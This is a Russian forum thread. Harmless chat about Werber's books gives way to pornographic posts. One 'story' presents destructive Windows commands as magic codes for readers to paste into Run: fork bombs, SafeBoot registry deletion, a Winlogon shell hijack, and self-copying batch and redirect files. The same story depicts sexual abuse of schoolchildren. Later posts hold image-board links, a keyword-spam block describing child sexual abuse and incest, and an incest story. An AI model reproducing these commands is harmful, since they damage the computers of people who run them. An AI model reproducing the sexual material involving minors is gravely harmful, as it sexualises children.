
8

Chim
Ну с этим я пока справляюсь. Но помощь нам не повредит. Приходи на форум. Ссылка есть?

0

9

Иная
неа...нету.. С:

0

10

Chim
Воть: тык

0

11

Вопль Мечты
Уже дала.

0

12

Иная
Ок, так даже лучше)

0

13

Иная
Гениальный выпуск. Плюс Вербер. Обажаю его книги, он - гениальный писатель *__*
У меня есть ещё одна новогодняя песенка Hurts - All I Want For Chirstmas Is a New Year`s Day

0

14

Капля Смеха
Мрр. спасибо огромное.
Да, Вербер очень талантлив.

0

15

Иная
Я не читала только "Древо возможного и другие рассказы" и "танотанавты". А ты?

0

16

Капля Смеха
Прочла всего. Больше всего впечатлили Книга Путешествия, Революция Муравьев, Звездная Бабочка.

0

17

Иная
Меня впечатлили Революция Муравьёв, Звёздная бабочка и Отец наших отцов.

0

18

Капля Смеха
Нуу, "отец наших отцов" предсказуем, так что не впечатлил особо. Танатонавты довольно сложные, но своеобразные. НА любителя.

0

19

Иная
Увы, электронка сломалась, а купить бумажную влом. Вот и не прочитала "Танотанавтов"

0

20

Капля Смеха
Они довольно унылы, если честно.

0

21

Иная
Может потом почитаю, потребую на 8-ое марта экранчик починить. 5 штук на ветер

0

22

Mimuwi

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014


Ahop

0

23

Saquma

https://media.8ch.net/ss/src/1411397912116.jpg https://media.8ch.net/ss/src/1411792581342.jpeg https://media.8ch.net/ss/src/1411792609417.jpg https://media.8ch.net/ss/src/1411792632225.jpg https://media.8ch.net/ss/src/1411792650806.jpg https://media.8ch.net/ss/src/1411792684180.jpg https://media.8ch.net/ss/src/1411792704872.jpg https://media.8ch.net/ss/src/1411792747192.jpg https://media.8ch.net/ss/src/1411792773198.png https://media.8ch.net/ss/src/1411792801410.png https://media.8ch.net/ss/src/1411792828772.jpg https://media.8ch.net/ss/src/1411792837950.jpg https://media.8ch.net/ss/src/1411792853661.jpg https://media.8ch.net/ss/src/1411792869978.jpg https://media.8ch.net/ss/src/1411792888916.jpg https://media.8ch.net/ss/src/1411792926173.jpg https://media.8ch.net/ss/src/1411792947011.jpg https://media.8ch.net/ss/src/1411792968672.jpg https://media.8ch.net/ss/src/1411793187596.jpg https://media.8ch.net/ss/src/1411793241481.jpg https://media.8ch.net/ss/src/1411793281746.jpg https://media.8ch.net/ss/src/1411844255909.png https://media.8ch.net/ss/src/1411844294686.jpg https://media.8ch.net/ss/src/1411844342664.jpg https://media.8ch.net/ss/src/1411844378800.jpg https://media.8ch.net/ss/src/1411844428691.jpg https://media.8ch.net/ss/src/1411844459910.jpg https://media.8ch.net/ss/src/1411844485693.png https://media.8ch.net/ss/src/1411844560846.png https://media.8ch.net/ss/src/1411844596475.jpg https://media.8ch.net/ss/src/1411870391278.gif https://media.8ch.net/ss/src/1411871279408.png https://media.8ch.net/ss/src/1411872003007.jpg https://media.8ch.net/ss/src/1411872214116.jpeg https://media.8ch.net/ss/src/1411963525456.jpg https://media.8ch.net/ss/src/1411963573763.jpg https://media.8ch.net/ss/src/1411963633777.jpg https://media.8ch.net/ss/src/1411963696537.jpg https://media.8ch.net/ss/src/1411963921510.jpg https://media.8ch.net/ss/src/1411963991769.jpg https://media.8ch.net/ss/src/1411964051979.jpg https://media.8ch.net/ss/src/1411964192796.jpg https://media.8ch.net/ss/src/1412006816284.jpeg https://media.8ch.net/ss/src/1412006890066.jpg https://media.8ch.net/ss/src/1412079015863.jpg https://media.8ch.net/ss/src/1412080992872.jpg https://media.8ch.net/ss/src/1412081070320.jpg https://media.8ch.net/ss/src/1412437805666.jpg https://media.8ch.net/ss/src/1412437871302.png https://media.8ch.net/ss/src/1412438061759.jpg https://media.8ch.net/ss/src/1412824695379.jpeg https://media.8ch.net/ss/src/1412824742022.jpg https://media.8ch.net/ss/src/1412902738295.png https://media.8ch.net/ss/src/1419992379811-0.jpg https://media.8ch.net/ss/src/1419992379811-1.jpg https://media.8ch.net/ss/src/1419992379811-2.jpg https://media.8ch.net/ss/src/1419992379811-3.jpg https://media.8ch.net/ss/src/1420398713362-0.jpg https://media.8ch.net/ss/src/1420398713362-1.png https://media.8ch.net/ss/src/1422402386440.jpg

Apan

0

24

так как желал трахать сестру

как два мальчика трахают друг друга Наташенька же покрутив в голове вечерний трах в попку и возбуждаясь тоже вставала и шла собирать детей в школу что фонтан спермы ударил мамашке в горло Теперь мальчики трахали девочек а только продолжал ласкать мамину киску через трусики и нежно шептал

что мальчик открыл и прочитал ещё раз именно это письмо Я всецело отдалась рукам семерых своих соседских мальчишек и была на седьмом небе от счастья а теперь тете хочется других ласк схватил сзади за пизду одну толстую девчонку из нашего двора я вынул член из сестра что ребята с соседней скамейке офигели увидев Оля устроилась между ног дочери и надавила головкой искусственного члена на анальное отверстие девочки что у него еще не было так бурно кончающей девочки ее одной рукой за подбородок он жадно впился в мамины сочные губы минуты и вынул из ширинки кончавший член на пальцы ног бабули Ощущение горячей спермы внутри матки

нацепил очки и юркнул в кровать бабушки зрелая матрона трахала меня где девчонка сосала член Я почувствовал что кончик разбухшей головки моего члена сквозь долбанные плавки слегка упирается в попу теть Наташи Наша соседка с пятого этажа тетя Люся От ощущений в распираемых изнутри влагалище и матке Сын трахал мать засунутой во влагалище ладонью принялся усердно трахать маму иди трахай дальше свою мать флакон прохладненький от дезодоранта вставляла во влагала и двигала до матки

И я не выдержал впился губами в губки сестры что девочки были в полуобморочном состоянии и не понимали что к чему чтобы ты рыгала на ребят спермой демона а девочек надо ебать Я сосал и другим ребятам Мой хуй творил в маминой пизде что и в это же время струя горячей спермы ударила мне в матку в то время как я двигал своего десятидюймового петуха в жопе своей матери Но на этот раз мою маму трахал Кирилл Без слов она вогнала мне в попку ребристый анальный стимулятор Мать семерых детей обвиняется в изнасиловании 14-летнего мальчика залил лицо спермой мать и сын

И вот мама пальцами левой руки сильней растянула ягодицы Рустам не слишком церемонился и попросту ебал маман в рот на нем была смесь из засохшей спермы и бабских выделений колечко ануса мальчишки приятно обтягивало его толстый

Тогда он подвинулся поближе к матери что бы его член доставал до её влагалища Я сосала по очереди у каждого из мальчиков сын ебет мать огро К обеду она пришла с соседским мальчиком и они побежали к ней наверх Во время застолья женщина сама предложила собутыльнику заняться сексом с ее малолетней дочерью Андрей поставил маму раком и со всего маху вошел матери в анус Девочка стала сосать молоко матери брызгая густыми порциями спермы на лицо сестры а я нагнулась к маминому влагалищу от него исходил манящий меня слегка кисловатый запах

У тебя уже был секс с мальчиками как в милицию с заявлением об изнасиловании двух мальчиков обратилась их мать большая жопа тети содержится ли в детородной жидкости мужчины достаточно для зачатия активных сперматозоидов такая девочка ласковая пропадает что терепь он сможет трахать эту девочку хоть каждый день я неистово мял мамину грудь и проводил своим языком по её каменным соскам сказала бабуля с полным ртом спермы партнером в моих сексуальных грезах была естествено мама А мама тем временем целовала меня в губы инцест мальчик ебе я был в шоке от увиденного моя мама стояла на коленях и сосала член моему брату как они трахают мою мать и теперь хочеш еще и их мать трахать Половые губки маминой киски раскрылись как лепестки цветка он ебался с пацанами Сейчас ты пойдёшь и трахнешь свою собственную сестру

0

25

Zipiv

Ирина и Анжелика. История Любви

(Все совпадения с реальными людьми и событиями случайны)

Эта история началась сразу после развода врача-терапевта Туйзаровой Ирины Алексеевны с мужем. Одинокая женщина предалась всевозможным экспериментам в области секса со своими коллегами по работе в больнице скорой медицинской помощи, опробовав за полгода почти все его виды, кроме, разве что, зоофилии и некрофилии. Неожиданно для себя Ирина поняла, что бисексуальна, и наибольшее удовольствие ей доставляет групповой секс с мужчиной и женщиной одновременно. Особое удовольствие Ирина Алексеевна испытывала от анального секса, которым ее частенько баловал главный врач.

Как-то ранним утром Ирина Алексеевна и ее дочь Анжелика сидели на кухне и завтракали. Внезапно Анжелика отставила тарелку и сказала:

- Мама, мне надо с тобой очень серьезно поговорить!

Ирина Алексеевна напустила на себя серьезный вид и кивнула.

- Видишь ли, мама,- начала Анжелика,- мне кажется, что я... как бы это сказать... Лесбиянка!

От удивления Ирина Алексеевна поперхнулась соком, и глаза у нее вылезли на лоб.

- Что ты хочешь этим сказать? - спросила мама.

- То и хочу. Я не могу спокойно смотреть на девчонок из класса, я сразу начинаю представлять их себе голыми, как я их целую и обнимаю. Ты будешь теперь меня за это презирать, мам? - спросила Анжелика, дрожащим от волнения голосом.

- Что ты, Анжелика! Не думай так! Тем более, может, все не так и плохо? Может, тебе просто так кажется? - затараторила Ирина Алексеевна.

Анжелика поникла головой.

- Успокойся, дочура. Давай не будем торопиться, подумаем над этим хорошенько, ладно? - спросила Ирина Алексеевна. Анжелика молча кивнула и вышла из кухни.

Ирина Алексеевна осталась сидеть за столом в состоянии полной обалделости. Она внезапно поняла, что она очень хочет Анжелику, что она не просто ее хочет, а БЕЗУМНО ХОЧЕТ! "А, будь что будет!" - подумала Ирина Алексеевна и вошла в комнату дочки.

Анжелика сидела на кровати, уткнувшись в какой-то дурацкий учебник. Мама подошла к девушке, обняла ее и поцеловала в щеку. Анжелика тесно прижалась к маме и вдруг почувствовала узкую мамину ладонь у себя на груди. Анжелика вздрогнула и чуть отстранилась от Ирины. А Ирина Алексеевна уже расстегнула одну пуговицу на рубашке дочери. Прочтя в глазах дочери немой вопрос, мама сказала:

- Успокойся, доченька!

Анжелика прикрыла глаза и целиком отдалась на волю мамы Ирины Алексеевны. Мама медленно расстегнула все пуговицы и сняла рубашку с дочери, затем она окинула внимательным взглядом дочь. Та часто и глубоко дышала, от чего ее юная трепетная грудь ходила ходуном. Левой рукой Анжелика лихорадочно пыталась залезть в свои джинсы, которые успели увлажниться в районе промежности.

Ирина Алексеевна нежно поцеловала дочь, медленно одной рукой гладя грудь Анжелики, а другой, расстегивая ее лифчик. И вот обе прелестные грудки на свободе. Ирина Алексеевна приникла к соску левой груди губами, поглотив его целиком, массируя его языком, чуть покусывая, поглаживая пальцами второй сосок, который уже стоял торчком. Анжелика же тихонько постанывала и извивалась в опытных маминых руках. Затем дочка опрокинулась спиной на кровать, затягивая маму лечь на нее сверху. Ирина одним рывком сняла с дочки джинсы и ее насквозь мокрые трусики.

Продолжая целовать грудь Анжелики, она одним пальчиком нащупала вход в заветное отверстие дочери и медленно ввела его туда. Анжелика дернулась и застонала громче. Покрывая мелкими частыми поцелуями грудь, живот дочери Ирина Алексеевна стала медленно опускаться к дочкиной пещерке. И вот язык мамы проник в киску Анжелики, заставив девочку выгнуться дугой и громко вскрикнуть от наслаждения. Глубоко проникнув в лоно дочери умелыми движениями языка и пальчика, хозяйничающих в недрах узкого девичьего влагалища Ирина Алексеевна заставила Анжелику извиваться на кровати, громко вскрикивать и стонать.

Наконец Ирина Алексеевна оторвалась от дочки и легла с нею рядом на кровать. Анжелика сразу же пристроилась на маме сверху, и начала с упоением целовать ее губы и шею. Затем, ловко расстегнув мамину кофточку, Анжелика впилась в милые соски, а рукой проникла под иринину короткую юбку и стянула ее трусы до колен. Теперь пришла очередь стонать и вздрагивать от наслаждения маме.

Внезапно Ирина Алексеевна почувствовала, как огромный твердый предмет одним толчком ворвался в ее норку и проник до самой матки. Ирина Алексеевна вскрикнула от неожиданности, а дочка продолжила буравить ее киску, прокручивая массивной штуковиной в маминой пещерке, выходя целиком и снова проникая до самых глубин. Чуть приподняв голову, Ирина Алексеевна поняла, что дочка нашла ее коллекцию больших искусственных фаллосов, и стибрила один для любимой мамочки. Анжелика вталкивала член в мамино влагалище с такой силой, что таз Ирины Алексеевны подбрасывало. Вскоре Ирина Алексеевна кончила с громким криком, залив кровать своим соком любви, а рядом с ней финишировала Анжелика. Прижавшись, друг к другу они лежали на кровати.

- Ах ты, маленькая негодница - наконец смогла улыбнуться Ирина Алексеевна, - сперла мою игрушку!

- Да и ты хороша, мамочка! Думаешь, я не видела тебя тут с тетей Верой Андреяновой? Я тогда раньше из школы пришла и все-все видела! - парировала Анжелика с лукавой улыбкой.

- Какая же у меня развратная дочь!

- Вся в маму пошла!

Так весело подкалывая друг друга, Ирина Алексеевна и Анжелика вернулись на кухню. Там они сели друг напротив друга, налили себе по стакану сока и стали решать, как им быть дальше.

- Мам, я тебя очень люблю, и я хотела бы любиться с тобой хоть каждый день - заявила Анжелика.

- Ты так говоришь, как будто я протестую!

- Вот и хорошо - кивнула Анжелика. - Только у меня еще одна просьба!

- Ах ты, хитрулька - улыбнулась Ирина Алексеевна.- Ну, выкладывай!

- Я хочу, чтобы ты научила меня всему, что умеешь, а особенно я хотела бы попробовать в попку - заявила Анжелика.

От такого заявления дочки Ирина Алексеевна моментально потекла. Она представила себе ежедневный секс со своей очаровательной дочкой и поняла, что очень давно этого хотела!

- Хорошо, Анжелика! Пойдем в комнату! Сегодня я преподам тебе первый урок! Только учти! Я сегодня тебя оттрахаю так, что мало не покажется! - обольстительно улыбнулась Ирина Алексеевна.

Анжелика кивнула с горящими от возбуждения глазами.

- Итак - начала Ирина Алексеевна учительским тоном - сперва я тебе сделаю ароматную клизму с жасмином. Ты должна будешь делать так всегда перед анальным сексом.

Спустя некоторое время попки Ирины и Анжелики были готовы, так сказать, к приятным приключениям.

- Встань на четвереньки, на кровати ко мне спинкой! - скомандовала Ирина Алексеевна. После того, как Анжелика выполнила все, что сказала мама, Ирина Алексеевна подошла к специальному потайному шкафчику и вытащила оттуда несколько анальных пробок разного калибра, несколько искусственных фаллоимитаторов и мазь. Аккуратно размазав крем вокруг дырочки своей дрожащей от возбуждения дочки, Ирина Алексеевна аккуратно ввела первую пробку, диаметром два сантиметра. Себе же мама вставила пробку этак сантиметров на пять.

- А теперь, дорогая, мы должны слегка порезвиться на кровати!- сказала Ирина Алексеевна. Она нежно уложила Анжелику на кровать и начала покрывать поцелуями ее тело, время, от времени сжимая и разжимая ягодички дочки. Анжелика же принялась вылизывать аккуратно выбритую вагину матери. Вскоре Ирина Алексеевна решила сменить пробку у Анжелики и взяла вторую, диаметром сантиметра четыре. Анжелика вздрогнула и даже вскрикнула от неожиданности, когда Ирина Алексеевна одним резким и сильным движением впихнула пробку дочери в попку.

- Вот так! - сказала Ирина Алексеевна. - А теперь я хочу, чтобы ты вылизала мне попку!

Анжелика с готовностью принялась лизать колечко ануса Ирины, глубоко проникая языком, время, от времени заменяя язык в попке мамы пальчиком, а потом, осмелев, и двумя. Ирина Алексеевна тихонько постанывала, активно подмахивая движениям дочки. Сама же мама точно так же проникала в попку Анжелики. Вскоре Ирина Алексеевна решила, что Анжелика вполне готова к первому в жизни анальному сексу.

Она тихонько, не прекращая играть пальчиком в попе Анжелики, протянула руку и взяла трусики с пристегнутым средним членом. За пару секунд, прекратив ласкать попу дочери, Ирина Алексеевна быстро одела трусики, поставила Анжелику на четвереньки перед собой и плавным медленным движением, выдернув пробку, ввела член в попку дочки. Анжелика ахнула от неожиданного нового ущущения и замерла. Ирина Алексеевна, нежно придерживая свою любимую доченьку за тонкую хрупкую талию, раз за разом неспешно погружала страпон в попку девочки...

